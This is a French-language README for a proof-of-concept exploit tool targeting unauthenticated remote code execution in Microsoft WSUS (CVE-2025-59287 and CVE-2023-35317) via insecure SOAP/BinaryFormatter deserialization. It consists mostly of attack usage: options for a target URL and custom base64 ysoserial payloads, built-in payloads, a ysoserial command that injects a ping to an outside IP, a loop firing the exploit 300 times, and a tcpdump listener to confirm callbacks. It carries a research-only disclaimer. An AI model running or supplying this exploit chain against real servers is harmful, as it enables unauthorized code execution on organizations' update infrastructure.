
PoC d'exécution de code à distance (RCE) non authentifiée dans Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
Au cœur de CVE-2025-59287 : RCE via SoapFormatter dans WSUS : https://shellcode.blog/wsus-cve-2025-59287-investigation/
Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.
Options obligatoires :
--target-url – URL de base du serveur WSUS cible, p. ex. http://WIN-246JC0TE3BB.vuln.local:8530--cve – L'un de CVE-2023-35317 ou CVE-2025-59287Options facultatives :
--dns-name – Nom DNS du client utilisé dans les requêtes SOAP (défaut : bugcrowd.local)--random – Préfixe --dns-name avec un sous-domaine aléatoire afin que chaque exécution apparaisse comme un nouveau client--payload – Payload ysoserial personnalisée encodée en base64 ; si elle est omise, une payload intégrée est utilisée pour le --cve choisi--debug – Active la journalisation de débogage détaillée (lignes [DEBUG])python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (ou fiez-vous à la payload intégrée pour --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done